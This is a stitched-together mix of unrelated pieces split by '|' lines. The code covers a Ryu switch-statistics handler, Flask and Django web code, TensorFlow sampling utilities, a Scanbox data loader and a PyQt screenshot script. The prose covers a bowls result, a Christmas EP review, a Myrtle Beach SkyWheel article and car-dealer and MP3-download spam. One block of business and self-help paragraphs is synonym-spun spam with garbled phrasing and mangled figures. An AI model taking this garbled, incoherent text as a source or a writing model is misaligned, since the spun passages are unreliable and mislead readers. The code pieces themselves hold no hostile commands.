        ofproto = datapath.ofproto
        parser = datapath.ofproto_parser
        req = parser.OFPPortStatsRequest(datapath, 0, ofproto.OFPP_ANY)
        datapath.send_msg(req)
    @set_ev_cls(ofp_event.EventOFPPortStatsReply, MAIN_DISPATCHER)
    def _port_stats_reply_handler(self, ev):
        """Handle PortStatsReply from switches method.

        Computes per-port and per-switch deltas since the previous reply
        and stores them in the shared switch_stat dict under 'stats',
        'weight', 'cost' and 'load'.
        """
        sw_dpid = ev.msg.datapath.id
        # self.logger.info('-----------')
        # self.logger.info(ev.msg.datapath.id)
        # self.logger.info('-----------')
        # Initialization
        if switch_stat.get(sw_dpid).get('stats') is None:
            switch_stat.get(sw_dpid).update({'stats': {}})
        if switch_stat.get(sw_dpid).get('weight') is None:
            switch_stat.get(sw_dpid).update({'weight': {}})
        if switch_stat.get(sw_dpid).get('cost') is None:
            switch_stat.get(sw_dpid).update({'cost': 0.0})
        if switch_stat.get(sw_dpid).get('load') is None:
            switch_stat.get(sw_dpid).update({'load': 0.0})
        # Switch-wide accumulators: rx-byte delta, tx-byte delta, dropped-packet delta.
        r = 0
        t = 0
        e = 0
        for stat in ev.msg.body:
            if stat.port_no in switch_stat.get(sw_dpid).get('alive_port'):
                # Claculate statistics on each active port
                # self.logger.info(stat.port_no)
                # Counter snapshot layout: [port_no, rx_bytes, tx_bytes,
                # rx_dropped, tx_dropped, rx_errors, tx_errors, collisions].
                counter_list = [stat.port_no, stat.rx_bytes, stat.tx_bytes, stat.rx_dropped, stat.tx_dropped, stat.rx_errors, stat.tx_errors, stat.collisions]
                port_stat = {stat.port_no: counter_list}
                p_r = 0
                p_t = 0
                p_e = 0
                if switch_stat.get(sw_dpid).get('stats').get(stat.port_no) is not None:
                    his_stat = switch_stat.get(sw_dpid).get('stats').get(stat.port_no)
                    # self.logger.info('%s %s', counter_list, his_stat)
                    # self.logger.info('rx_byte %d', (counter_list[1] - his_stat[1])/1)
                    # self.logger.info('tx_byte %d', (counter_list[2] - his_stat[2])/1)
                    # self.logger.info('drop %d', (counter_list[3] - his_stat[3])/1)
                    # Deltas since the last reply; /1 normalizes to the 1-second
                    # polling interval set in _monitor.
                    p_r = (counter_list[1] - his_stat[1])/1
                    p_t = (counter_list[2] - his_stat[2])/1
                    # Indices 3 and 4 are rx_dropped/tx_dropped, so p_e counts drops.
                    p_e = (counter_list[3] + counter_list[4] - his_stat[3] - his_stat[4])/1
                    r = r + (counter_list[1] - his_stat[1])/1
                    t = t + (counter_list[2] - his_stat[2])/1
                    e = e + (counter_list[3] + counter_list[4] - his_stat[3] - his_stat[4])/1
                weight_list = [p_r, p_t, p_e]
                port_weight = {stat.port_no: weight_list}
                # Update port statistics
                sw_stat = switch_stat.get(sw_dpid).get('stats')
                sw_stat.update(port_stat)
                sw_weight = switch_stat.get(sw_dpid).get('weight')
                sw_weight.update(port_weight)
        # self.logger.info('=======')
        # self.logger.info('cost function r : %d', r)
        # self.logger.info('cost function t : %d', t)
        # self.logger.info('cost function r-t: %d', r-t)
        # self.logger.info('cost function d: %d', e)
        # ts = time.time()
        # st = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')
        # self.logger.info('time %s', st)
        # Switch cost = (rx - tx) / rx; only defined when traffic was received.
        pp = r-t
        if r != 0:
            # self.logger.info('cost function: %f',float(pp)/float(r))
            switch_stat.get(sw_dpid).update({'cost': float(pp)/float(r)})
        switch_stat.get(sw_dpid).update({'load': [r, t, e]})
|
Delivery Company presents worldwide transport by sea, air and land for a number of companies every day. They handle all kinds of freights serving to the companies to courier their products. They assure that the freights attain its destination on time. Whether or not it is small or large, all companies may have quite a few freights to ship from one point to a different. Corporations at all times choose freight providers that can bring maximum profits and save time while transferring or shifting items. Normally reputed transport firms will fulfill the wants of their customers and provide dependable freight movement to other international locations and continents. In addition they guarantee on-time supply and security of the products.
When Matt Morris was 21 years outdated, he was broke, homeless, dwelling out of his car and showering beneath the gutter when it rained. 27 months later, he had turned his entire life around via the facility of private growth and made over $three,244,832 in his own companies. Matt envisions a world where poverty doesn’t exist, the place no little one has to go to mattress hungry, and has chosen to take personal duty to attempt to create such a world.
Preserving observe of enterprise expenses helps you stay organized, which can ultimately result in financial savings at tax time. Include all the pieces that you simply spend on your corporation, transportation and ISP service are frequent examples. Once you’re self employed, there are various business bills that become tax deductible. Although the amount seems small, it could shortly add up. You should not have to offer the government the entire money that you just labored onerous to earn.
There are totally different points of ceremonies for celebrations equivalent to debuts, birthdays, weddings and other events. There’s the speech by the bride, groom, or other celebrants. There’s the meet and greet, the place previous mates and family meet, alternate pleasantries, and talk concerning the various things that have happened since they last met. Taking pictures and having the meals served are after all, frequent actions throughout formal occasions. Nonetheless, these actions need to mesh collectively in a approach that the company will have the ability to fully enjoy the celebration. On the day of the occasion, one of the most essential individuals for this specific job is the master of ceremonies, who takes on the responsibilities of both entertainer and guiding pressure for the occasion.
The cost of viral advertising and marketing is really dependent on the price of the initial inventive piece that will get sent round. Usually things that go viral aren’t slick, well polished pieces. There are by nature more like residence movies or beginner production items.
Partnership business is the place two or extra individuals formally comply with do enterprise collectively. Partnerships are very straightforward to form; the revenue earned from the business is filed on the person companions’ tax returns. As with sole proprietorship, there is no need of paying corporate income tax and may also avoid double taxation. But sole proprietorship, involves plenty of threat.
5 P.S. 1.original structure and advanced technical design. The secret sauce it research who the goal market is (in all probability folks like you) and analysis how others are incomes cash within the niche. Now listed here are just a few ideas on find out how to begin. Reasons Filipino physiotherapists determine to affix a evaluate middle? 1. a payment account, It is observed that proportion of women customers elevated by seventy two% from 2008 to 2011.
42 year-old Master Fisher Luigi from Guelph, really loves skateboarding, Business and yoyo. Has just finished a journey to Three Parallel Rivers of Yunnan Protected Areas.
|
# -*- coding: utf-8 -*-
from flask import Flask,request, url_for,render_template
import mandelbrot
import random
app = Flask(__name__)
@app.route("/user/pepe")
def pepe():
    """Static page for the hard-coded user 'pepe'."""
    contenido = "CONTENIDO WEB ESTATICO PARA PEPE"
    return contenido
@app.route("/user/zerjillo")
def zerjillo():
    """Static page for the hard-coded user 'zerjillo'."""
    contenido = "CONTENIDO WEB ESTATICO PARA ZERJILLO"
    return contenido
@app.route("/user/<name>")
def usuario(name):
    """Generic per-user page; `name` comes from the URL path."""
    return "CONTENIDO WEB ESTATICO PARA EL USUARIO : " + name
@app.route("/mandelbrot", methods=['POST'])
def mand():
    """Render a Mandelbrot image for the posted viewport and return an <img> tag."""
    form = request.form
    # NOTE: the submitting page spells the field 'witdh'; keep the key as-is.
    x1, y1 = float(form['x1']), float(form['y1'])
    x2, y2 = float(form['x2']), float(form['y2'])
    width = int(form['witdh'])
    mandelbrot.renderizaMandelbrot(x1, y1, x2, y2, width, 500, "static/mandelbrot.png")
    return '<img src=' + url_for('static', filename='mandelbrot.png') + ' width="50%" >'
@app.route("/")
def hello():
    """Root page: a link to practice 2's static index."""
    destino = "http://localhost:8080/static/index2.html"
    return '<a href=' + destino + '>' + "IR A PRACTICA 2" + "</a>"
@app.route("/svg")
def svg():
    """Return a 500x500 SVG with 100 randomly placed, sized and colored circles.

    Fixes over the original: drops the unused `bucle` variable, removes the
    needless single-entry dict indirection, and joins parts instead of
    repeated string concatenation.
    """
    colors = ['blue', 'black']
    parts = ['<svg height="500px" width="500px">']
    for _ in range(100):
        parts.append(
            '<circle cx="' + str(random.randint(1, 500))
            + '" cy="' + str(random.randint(1, 500))
            + '" r="' + str(random.randint(1, 20))
            + '" stroke="' + colors[random.randint(0, 1)]
            + '" stroke-width="' + str(random.randint(1, 2))
            + '" fill="' + colors[random.randint(0, 1)] + '" />')
    parts.append('</svg>')
    return ''.join(parts)
@app.errorhandler(404)
def page_not_found(error):
    """Custom handler for unknown routes: plain message plus a 404 status."""
    return ("Pagina no encontrada", 404)
if __name__ == "__main__":
    # Listen on all interfaces with Flask's auto-reloading debug server.
    app.run(host='0.0.0.0',debug=True)
|
Sebastopol claimed victory on Saturday, but it wasn’t enough to break back into the Geelong-Ballarat Premier Bowls top four. The Kookaburras beat Buninyong by 29 shots, however they still remain in sixth spot on the table. Sebastopol is seven points behind the fourth-placed Eastern Park, which beat top side Bareena on Saturday. That loss was only Bareena’s second for the campaign. Elsewhere at the weekend, Ocean Grove claimed a strong victory over the lowly Highton and Lara kept up the pressure on the top four with success against bottom side Victoria. The final match of the round saw Queenscliff outgun Webbcona.
GOOD ROLL: Sebastopol's Rob Baker in action on Saturday afternoon.
Sebastopol claimed victory on Saturday, but it wasn’t enough to break back into the Geelong-Ballarat Premier Bowls top four.
The Kookaburras beat Buninyong by 29 shots, however they still remain in sixth spot on the table.
Sebastopol is seven points behind the fourth-placed Eastern Park, which beat top side Bareena on Saturday.
That loss was only Bareena’s second for the campaign.
Elsewhere at the weekend, Ocean Grove claimed a strong victory over the lowly Highton and Lara kept up the pressure on the top four with success against bottom side Victoria.
The final match of the round saw Queenscliff outgun Webbcona.
|
# Copyright 2019 Deepmind Technologies Limited.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Distribution utilities."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
import tensorflow_probability as tfp
tfd = tfp.distributions
def multi_normal(loc, log_scale):
  """Convenience factory for a diagonal Gaussian parameterized by log-scale."""
  dist = MultiNormalDiagFromLogScale(loc=loc, log_scale=log_scale)
  return dist
class MultiNormalDiagFromLogScale(tfd.MultivariateNormalDiag):
  """MultiNormalDiag which directly exposes its input parameters.

  The base distribution is constructed with scale = exp(log_scale); the
  raw `loc` and `log_scale` tensors are kept so callers can optimize them
  directly (see `dist_vars`).
  """
  def __init__(self, loc, log_scale):
    # Parameterize via log-scale so the scale is positive by construction.
    scale = tf.exp(log_scale)
    self._log_scale = log_scale
    self._input_mean = loc
    super(MultiNormalDiagFromLogScale, self).__init__(
        loc, scale)
  @property
  def input_mean(self):
    # The `loc` tensor exactly as passed to the constructor.
    return self._input_mean
  @property
  def log_scale(self):
    # The raw log-scale tensor (not exponentiated).
    return self._log_scale
  @property
  def dist_vars(self):
    # The trainable parameters of this distribution, in [mean, log_scale] order.
    return [self.input_mean, self.log_scale]
def diagonal_gaussian_posterior(data_dims):
  """Create a trainable diagonal Gaussian over `data_dims` dimensions,
  initialized to a standard normal (zero mean, zero log-scale)."""
  init = tf.zeros(shape=(data_dims), dtype=tf.float32)
  mean = tf.Variable(init, name='mean')
  log_scale = tf.Variable(init, name='log_scale')
  return multi_normal(loc=mean, log_scale=log_scale)
def std_gaussian_from_std_dsmaxwell(std_dsmaxwell_samples):
  """Generate standard Gaussian variates coupled to Maxwell variates.

  Multiplying a double-sided Maxwell M(0,1) sample by an independent
  Uniform(0,1) sample yields an N(0,1) variate, which can then be
  loc-scale adjusted. Useful for coupling samples from the two
  distributions.

  Args:
    std_dsmaxwell_samples: Samples from a zero-mean, unit-variance
      double-sided Maxwell distribution M(0,1).

  Returns:
    Tensor of Gaussian variates with the same shape as the input.
  """
  uniforms = tf.random.uniform(std_dsmaxwell_samples.shape)
  return uniforms * std_dsmaxwell_samples
def sample_weibull(sh, scale, concentration):
  """Draw Weibull(scale, concentration) samples of shape `sh` via the
  inverse-CDF transform of a uniform clipped just below 1."""
  base = tfp.distributions.Uniform(low=0., high=1. - 1e-6)
  inverse_cdf = tfp.bijectors.Invert(
      tfp.bijectors.Weibull(scale=scale, concentration=concentration))
  transformed = tfp.distributions.TransformedDistribution(
      distribution=base, bijector=inverse_cdf)
  return transformed.sample(sh)
def sample_ds_maxwell(sh, loc, scale):
  """Draw samples of shape `sh` from a double-sided Maxwell(loc, scale)."""
  dist = tfd.DoublesidedMaxwell(loc=loc, scale=scale)
  return dist.sample(sh)
|
So I feel most would agree that while Christmas is one of the best times of year, the music can get quite repetitive. I mean, all we ever hear is Mariah Carey, Michael Buble, Justin Bieber’s “Drummer Boy” and Ariana Grande’s “Santa Tell Me” and while there is nothing really wrong with this, its been the same songs for years and I know I’m in the need for something new. Now, good thing Tyler, the Creator has my back and has released a Christmas-Grinch themed EP just in time. The EP is only 10 minutes with 6 songs but doesn’t include “You’re A Mean One, Mr Grinch” (my 2018 Christmas anthem) or “ I Am the Grinch” which are featured on the soundtrack for the new animated Grinch movie. So let’s take a look of what Tyler has brought us this Christmas.
Now as I said before the EP has only 6 tracks and like most EPs the first is just an intro. The intro track is called “Whoville” after the iconic village featured in the Grinch. The song starts off with your standard piano chord progression but as the song progresses little details are involved and build up to the end of the song. For example after a couple rounds of the chord progressions a little melody is introduced, then little bells are brought in, then the synths and then what sounds like a xylophone with some percussion and it all crescendos until an abrupt stop at the end when the next song begins. Now, generally I’m not a big fan of these intro tracks because I find most quite basic but Tyler was able to capture and create such a vivid mood in only a minute which really set the tone for the EP so props to him.
The song that follows is “Lights On” featuring Ryan Beatty and Santigold. I think this is one of the best songs on the EP because the melody resembles your typical Christmas song but with the beat added in the background it gives it more of a modern style. I also think it has a really catchy tune which will 100% be stuck in my head for the next week or two. Lyrically I interpreted the song as being about a relationship where the girl is alone at home around Christmas time and the boy is talking about how he’s rushing home and even though it may take a while he’s on his way to her. I think it’s actually a really cute song and definitely one of my favourites.
Track 3 is “Hot Chocolate” featuring Jerry Paper and is very fitting for this time of the year. Again, keeping with the Christmas theme, the melody resembles a Christmas carol and the intro even incorporates some bells but the added production shows that it belongs in the modern alternative music era. I think this is one of the songs that makes you feel all warm and fuzzy inside because it’s very simply about making a hot chocolate and drinking it by the fire surrounded by friends at Christmas time. Tyler is able to depict the ideal way to spend your holidays surrounded by friends and I think this song is quite beautiful in its simplicity.
Next is “Big Bag” and is the typically Tyler, the Creator sound we all know and love. The melody and beat is quite typical of Tyler, with a lot of rapping and an upbeat rhythm that was heard a lot on his last album “Flower Boy”. The “Big Bag” in the song refers to Santa’s sack full of presents and Tyler talks about how he didn’t really have a Santa Claus because his mum worked so he was wrapping his own gifts. However, in the second verse the point of view changes and Tyler raps from the point of the view of the Grinch and talks about stealing the presents of other kids. I think this contrast is really interesting because it shows the different ways people grow up around Christmas, you know, some didn’t have the typical childhood Christmas as they couldn’t afford it where others grew up with a very wealthy lifestyle and almost have this feeling of entitlement around the holidays and I think this contrast, whether intended or not, is a very clever thing to have included in the EP. I also love the common theme of the Grinch as that’s my favourite Christmas movie.
The next track is “When Gloves Come Off” featuring Ryan Beatty again. This one is very similar to “Hot Chocolate” in that identical instruments are used but with a different melody. This one is more of a transitional track rather than a song because it’s very melodic based with vocal harmonies and runs by Ryan Beatty and few actual words being sung. This one is probably a skip for me as I generally prefer more lyrically based songs but if you’re into instrumentals this might be the one for you.
The final track on the album is “Cindy Lou’s Wish”, named after the little girl from the Grinch. This song too is purely instrumental with no words at all. When I first listened to it, I’ve got to say I was a little disappointed. For the last track of the album I was expecting the perfect Christmas track to top off the album so having an instrumental was a bit anticlimatic. I could see why Tyler would have chosen an instrumental as a closing track, to almost fade the album to its end but i would have prefered a more upbeat ending. There’s not much to say about the track in general as its very similar to the rest of the album. The same instruments used with even a very similar sounding melody, much like “Lights On” and “Hot Chocolate”. Most of the songs sound relatively similar so that’s why I found this one a but of a let down because I was craving something new.
Overall I really enjoyed the album, disregarding the last two tracks. My favourite though is definitely “Lights On” because it just puts you in the Christmas spirit. So I would definitely recommend listening to this album this holiday season, maybe you’ll find a song will become one of your yearly favourites.
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.6 on 2016-12-29 08:15
from __future__ import unicode_literals
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated migration (Django 1.9, 2016-12-29) adding mail fields
    to the ``order.Email`` model and making its ``id`` an explicit AutoField.
    """

    # Must run after the initial schema for the ``order`` app.
    dependencies = [
        ('order', '0001_initial'),
    ]

    operations = [
        migrations.AddField(
            model_name='email',
            name='content',
            field=models.CharField(max_length=3000, null=True),
        ),
        migrations.AddField(
            model_name='email',
            name='create_time',
            # verbose_name is "创建时间" (creation time).
            # NOTE(review): the default is the fixed datetime captured when the
            # migration was generated, not the insert time — presumably
            # auto_now_add / timezone.now was intended; confirm before reuse.
            field=models.DateField(default=datetime.datetime(2016, 12, 29, 16, 15, 9, 188000), verbose_name='\u521b\u5efa\u65f6\u95f4'),
        ),
        migrations.AddField(
            model_name='email',
            name='from_user',
            field=models.CharField(max_length=50, null=True),
        ),
        migrations.AddField(
            model_name='email',
            name='status',
            field=models.IntegerField(default=0),
        ),
        migrations.AddField(
            model_name='email',
            name='title',
            field=models.CharField(max_length=100, null=True),
        ),
        migrations.AddField(
            model_name='email',
            name='to_user',
            field=models.CharField(max_length=100, null=True),
        ),
        migrations.AlterField(
            model_name='email',
            name='id',
            # verbose_name is "邮件Id" (mail id).
            field=models.AutoField(primary_key=True, serialize=False, verbose_name='\u90ae\u4ef6Id'),
        ),
    ]
|
This Dodge Avenger Looks and Drives good. Great value! Bad Credit? We Can Help!
Crown City Motors | Bad Credit Car Loan Specialists has been visited 15,465,974 total times.
|
"""Example script to load Scanbox data as a SIMA sequence."""
from __future__ import division
import argparse
import fnmatch
import os
import numpy as np
import sima
from sima import imaging_parameters
def sbxread(path, info_path):
    """Read in an .sbx file and return a SIMA sequence.

    Based off of the sbxRead Matlab implementation and
    https://scanbox.org/2016/09/02/reading-scanbox-files-in-python/

    Parameters
    ----------
    path : str
        Path to the Scanbox data file (including the .sbx extension).
    info_path : str
        Path to the Scanbox info MAT file.
    """
    params = imaging_parameters.extract_imaging_parameters(
        info_path, format='Scanbox')

    n_planes = params['nplanes']
    dims = (params['nchannels'],                    # c
            params['sz'][1],                        # x (columns)
            params['recordsPerBuffer'],             # y (rows)
            n_planes,                               # z
            (params['max_idx'] + 1) // n_planes)    # t (frames per plane)

    raw = sima.Sequence.create(
        'memmap', path=path, shape=dims, dim_order='cxyzt', dtype='uint16',
        order='F')
    # Subtract the raw data from the uint16 ceiling — presumably because
    # Scanbox stores inverted intensities (see the linked blog post).
    ceiling = sima.Sequence.create(
        'constant', value=np.iinfo('uint16').max, shape=raw.shape)
    return ceiling - raw
def initialize_sbx_datasets(path, calc_time_averages=False):
    """Locate and initialize a SIMA dataset for all Scanbox sbx files.

    Walks *path* recursively; each ``*.sbx`` file with a matching ``.mat``
    info file and no existing ``.sima`` directory gets a new dataset.
    """
    for root, dirs, filenames in os.walk(path):
        for sbx_name in fnmatch.filter(filenames, '*.sbx'):
            stem = os.path.splitext(sbx_name)[0]
            mat_name = stem + '.mat'
            sima_name = stem + '.sima'
            if mat_name not in filenames or sima_name in dirs:
                continue  # missing metadata, or already initialized
            sima_path = os.path.join(root, sima_name)
            print("Initializing SIMA dataset: {}".format(sima_path))
            sequence = sbxread(os.path.join(root, sbx_name),
                               os.path.join(root, mat_name))
            dataset = sima.ImagingDataset([sequence], savedir=sima_path)
            if calc_time_averages:
                print("Calculating time averages: {}".format(sima_path))
                dataset.time_averages
if __name__ == '__main__':
    # CLI entry point: walk a directory tree and initialize SIMA datasets.
    parser = argparse.ArgumentParser()
    parser.add_argument(
        "-t", "--time_averages", action="store_true",
        help="Pre-calc time averages.")
    parser.add_argument(
        "path", action="store", type=str, default=os.curdir,
        help="Locate all Scanbox files below this path.")
    cli_args = parser.parse_args()
    initialize_sbx_datasets(cli_args.path, cli_args.time_averages)
|
Being on vacation is your time to relax, enjoy fun with family and friends and of course, take in the beautiful scenery of the Carolina coastline. This vacation, experience all three pastimes in a new and memorable way by taking a ride on one of Myrtle Beach’s newest and most exciting attractions: The Myrtle Beach SkyWheel.
Located near the Oceanfront Boardwalk and Promenade in Myrtle Beach, SC, the Myrtle Beach SkyWheel opened on May 20, 2011, it operates year-round and has been a huge draw for the tourism industry. So impressive in its size and structure, it can easily be seen from the 501 bridge and acts as a beacon luring vacationers and locals alike to experience a view of the Grand Strand like no other. It is also truly unique in that it is the only observation wheel of its kind in the United States and only the second one in North America. Visitors are invited to step inside one of forty-two climate-controlled and fully enclosed glass gondolas for an eight to twelve-minute ride that will go through three full rotations and take them two hundred feet above sea level. Enjoy panoramic, 360 degree views of the beautiful Atlantic Ocean, gaze upon miles of pristine, white sandy beaches and have a view of Myrtle Beach that will take your breath away.
All gondola passengers will be able to take amazing photographs due to the state of the art, non-reflective glass that encloses each structure. For those vacationers who are looking to view the Grand Strand in an ultimate way, the VIP gondola will take the experience to an entirely different level. Passengers who participate in this option will get to skip the long waiting lines and be personally escorted onto a special VIP gondola with leather seating and a glass-bottomed floor, which will truly give an eye-opening perspective on how tall almost twenty stories really is. Ice buckets are also found inside the VIP gondola to keep your beverages chilled during your ride in the sky.
Once the experience has ended, visitors have the opportunity to visit the gift shop for a vacation souvenir or to stop for a bite to eat at the brand new Jimmy Buffet’s Land Shark Bar and Grill that accompanies the SkyWheel. Parrotheads and others alike will delight in excellent oceanfront views, tasty food and drinks and get to listen to fantastic tunes all while reminiscing about their recent trip high above the Grand Strand. For those who arrive after dark, the Myrtle Beach SkyWheel offers a fantastic evening light show that uses over one million, beautiful LED lights to provide viewers with an amazing show that is sure to delight visitors from the very young to the old.
The Myrtle Beach SkyWheel is located at 1110 North Ocean Boulevard, Myrtle Beach, South Carolina 29577 and visitors can call (843) 839-9200 for more information. The SkyWheel is an amazing and awe-inspiring experience that is sure to make your vacation one that is unforgettable. Here is an opportunity for you to see Myrtle Beach the way you haven’t seen it before and a chance for you to walk away with memory that will last for always.
|
#!/usr/bin/env python
#-*- encoding:utf-8 -*-
# screenshot.py
from PyQt4.QtGui import QApplication, QPixmap
from os import environ, mkdir, listdir
from sys import argv, platform
from time import strftime, gmtime
class Screenshot(object):
    """Capture the full desktop to a PNG file under ./screenshot/.

    Files are named ``<user>_<timestamp>.png``. Works on Windows and
    POSIX (username is read from USERNAME / USER respectively).
    """

    def __init__(self):
        # Resolve the login name per platform.
        if platform == 'win32':
            self.usuario = environ['USERNAME']
        else:
            self.usuario = environ['USER']
        # Ensure the output directory exists next to the working directory.
        if not 'screenshot' in listdir('./'):
            mkdir('screenshot')

    def capturarPantalla(self):
        """Grab the whole desktop and save it as a PNG."""
        # BUG FIX: ':' is illegal in Windows filenames, so the original
        # "%H:%M:%S" format made QPixmap.save() fail on win32. Use '-'.
        time = strftime("%d %b %Y_%H-%M-%S", gmtime())
        imagen = './screenshot/' + self.usuario + '_' + time + '.png'
        # BUG FIX: only one QApplication may exist per process; constructing
        # a new one on every call raised on the second capture. Reuse it.
        app = QApplication.instance() or QApplication(argv)
        desktop = QApplication.desktop()
        winId = desktop.winId()
        geometry = desktop.screenGeometry()
        captura = QPixmap.grabWindow(winId, 0, 0,
                                     geometry.width(), geometry.height())
        captura.save(imagen)
def main():
    """Script entry point: take a single screenshot."""
    Screenshot().capturarPantalla()


if __name__ == '__main__':
    main()
|
Free download Nyte SA – Ebenezer (Original Mix) Mp3. We have about 10+ mp3 files ready to play and download. To start this download Lagu you need to click on [Download] Button. Remember that by downloading this song you accept our terms and conditions. We recommend the first song titled Nyte SA – Ebenezer (Original Mix).mp3 for free.
|
import datetime
from django.contrib.auth.decorators import login_required
from django.contrib.auth.models import User
from django.db.models.aggregates import Sum
from django.db.models import Q
from django.shortcuts import get_object_or_404
from django.views.decorators.clickjacking import xframe_options_exempt
from django.views.decorators.csrf import csrf_exempt
from django.utils import timezone
from django.views.generic.simple import redirect_to
from annoying.decorators import ajax_request
from annoying.decorators import render_to
from accounts.models import UserProfile
from api.models import ChatMessage, MuteList
from api.models import EyeHistory
from api.models import EyeHistoryMessage
from api.models import Page
from api.models import Domain
from api.models import Ratings
from api.utils import humanize_time
from tags.models import Tag
from common.view_helpers import JSONResponse
from common.templatetags.gravatar import gravatar_for_user
from common.templatetags.filters import url_domain
from api.views import rating_get
from eyebrowse.settings import BASE_URL
import re
# Matches Twitter-style @mentions; group(1) is the bare username.
twitter_username_re = re.compile(r'@([A-Za-z0-9_]+)')
def logged_in(request):
    """Report whether the requesting user is authenticated (and who)."""
    if not request.user.is_authenticated():
        return JSONResponse({'res': False})
    return JSONResponse({'res': True,
                         'username': request.user.username})
@login_required
def ticker_info(request):
    """Ticker payload: followed users active in the last 5 minutes plus
    their single most recent history item that is not muted.

    Returns JSON with ``online_users`` (sorted by username) and
    ``history_item`` (or None if nothing recent/unmuted was found).
    """
    timestamp = timezone.now() - datetime.timedelta(minutes=5)
    followers = User.objects.filter(userprofile__followed_by=request.user)
    history = EyeHistory.objects.filter(
        start_time__gt=timestamp).order_by('-start_time').select_related()

    most_recent_hist = None

    mutelist_urls = MuteList.objects.filter(
        user=request.user,
        url__isnull=False
    ).values_list('url', flat=True)

    mutelist_words = MuteList.objects.filter(
        user=request.user, word__isnull=False
    ).values_list('word', flat=True)

    users = []
    # BUG FIX: the original tested `h.user not in users`, but `users` holds
    # result dicts, so the membership test never matched and the same user
    # could be appended once per history row. Track seen User objects.
    seen_users = []
    for h in history:
        if h.user not in seen_users and h.user in followers:
            if most_recent_hist is None:
                # Suppress the history item if its URL or title is muted.
                show = True
                if len(mutelist_urls) > 0:
                    for m in mutelist_urls:
                        if m in h.url:
                            show = False
                if show and len(mutelist_words) > 0:
                    for m in mutelist_words:
                        if m in h.title:
                            show = False
                if show:
                    most_recent_hist = h
            seen_users.append(h.user)
            users.append({'username': h.user.username,
                          'pic_url': gravatar_for_user(h.user),
                          'url': '%s/users/%s' % (BASE_URL, h.user.username),
                          })
    res = {}
    res['online_users'] = sorted(users, key=lambda u: u['username'])

    if most_recent_hist is not None:
        res['history_item'] = {'username': most_recent_hist.user.username,
                               'pic_url': gravatar_for_user(most_recent_hist.user),
                               'user_url': '%s/users/%s' % (BASE_URL, most_recent_hist.user.username),
                               'url': most_recent_hist.url,
                               'title': most_recent_hist.title,
                               'favicon': most_recent_hist.favIconUrl,
                               'time_ago': humanize_time(timezone.now() - most_recent_hist.start_time)
                               }
        # Attach the viewer's own tag for the item's domain, if any.
        t = Tag.objects.filter(user=request.user, domain=most_recent_hist.domain)
        if t.exists():
            res['history_item']['tag'] = {'name': t[0].name,
                                          'color': t[0].color}
    else:
        res['history_item'] = None

    return JSONResponse(res)
@csrf_exempt
@login_required
def bubble_info(request):
    """Build the "bubble" payload for the POSTed ``url``.

    Returns up to six followed users who viewed the page (or its domain)
    within the last week, bucketed by recency, plus the most recent message
    a followed user left on the page (falling back to chat messages).
    """
    url = request.POST.get('url', '')
    domain = url_domain(url)

    # Only consider activity from the last 7 days.
    timestamp = timezone.now() - datetime.timedelta(days=7)

    used_users = []
    active = []

    followers = User.objects.filter(userprofile__followed_by=request.user)

    # Visits to this exact URL or its domain by anyone but the requester,
    # most recently finished first.
    eyehists = EyeHistory.objects.filter((
        Q(url=url) | Q(domain=domain)) &
        Q(start_time__gt=timestamp) &
        ~Q(user_id=request.user.id)
    ).order_by('-end_time').select_related()

    for eyehist in eyehists:
        if len(active) >= 6:  # cap the bubble at six avatars
            break
        user = eyehist.user
        if user not in used_users and user in followers:
            # Recency bucket: 0 = <5 min, 1 = <1 h, 2 = <24 h, 3 = older.
            old_level = 3
            if eyehist.end_time > \
                    (timezone.now() - datetime.timedelta(minutes=5)):
                old_level = 0
            elif eyehist.end_time > \
                    (timezone.now() - datetime.timedelta(hours=1)):
                old_level = 1
            elif eyehist.end_time > \
                    (timezone.now() - datetime.timedelta(hours=24)):
                old_level = 2
            # Distinguish exact-page visits from same-domain visits.
            url_level = "site-level"
            if eyehist.url == url:
                url_level = "page-level"
            active.append({'username': user.username,
                           'pic_url': gravatar_for_user(user),
                           'url': '%s/users/%s' % (BASE_URL, user.username),
                           'old_level': old_level,
                           'url_level': url_level,
                           'time_ago': humanize_time(
                               timezone.now() - eyehist.end_time)
                           })
            used_users.append(user)

    # Most recent message on this page left by a followed user.
    messages = EyeHistoryMessage.objects.filter(
        Q(eyehistory__url=url) &
        Q(post_time__gt=timestamp)
    ).order_by('-post_time').select_related()

    about_message = None
    user_url = None
    username = None
    message = None
    for m in messages:
        if m.eyehistory.user in followers:
            message = m.message
            about_message = humanize_time(
                timezone.now() - m.post_time) + ' ago'
            user_url = '%s/users/%s' % (BASE_URL, m.eyehistory.user.username)
            username = m.eyehistory.user.username
            break

    # Fall back to chat messages (note: these are not time-limited).
    if not about_message:
        chat_messages = ChatMessage.objects.filter(
            url=url).order_by('-date').select_related()
        for c in chat_messages:
            if c.author in followers:
                about_message = humanize_time(timezone.now() - c.date) + ' ago'
                message = '"%s"' % (c.message)
                user_url = '%s/users/%s' % (BASE_URL, c.author.username)
                username = c.author.username
                break

    if not about_message:
        about_message = ''
        message = ''

    return JSONResponse({
        'url': url,
        'active_users': active,
        'message': message,
        'about_message': about_message,
        'user_url': user_url,
        'username': username,
    })
@ajax_request
def profilepic(request):
    """Redirect to the requesting user's gravatar, forced to HTTPS."""
    url = gravatar_for_user(request.user)
    # BUG FIX: the old code unconditionally chopped 7 characters off the
    # front, corrupting any URL that does not start with "http://".
    if url.startswith('http://'):
        url = 'https://%s' % url[7:]
    return redirect_to(request, url)
@login_required
@ajax_request
def get_friends(request):
    """Typeahead lookup over the users this user follows (max six results).

    An empty/absent ``query`` matches every friend.
    """
    # BUG FIX: `request.GET.get('query', None).lower()` raised
    # AttributeError whenever the parameter was missing.
    query = (request.GET.get('query') or '').lower()
    user_prof = UserProfile.objects.get(user=request.user)
    friends = user_prof.follows.all()
    data = []
    for friend in friends:
        if not query or query in friend.user.username.lower():
            data.append({'id': friend.id,
                         'name': '@%s' % (friend.user.username),
                         'avatar': gravatar_for_user(friend.user),
                         'type': 'contact'})
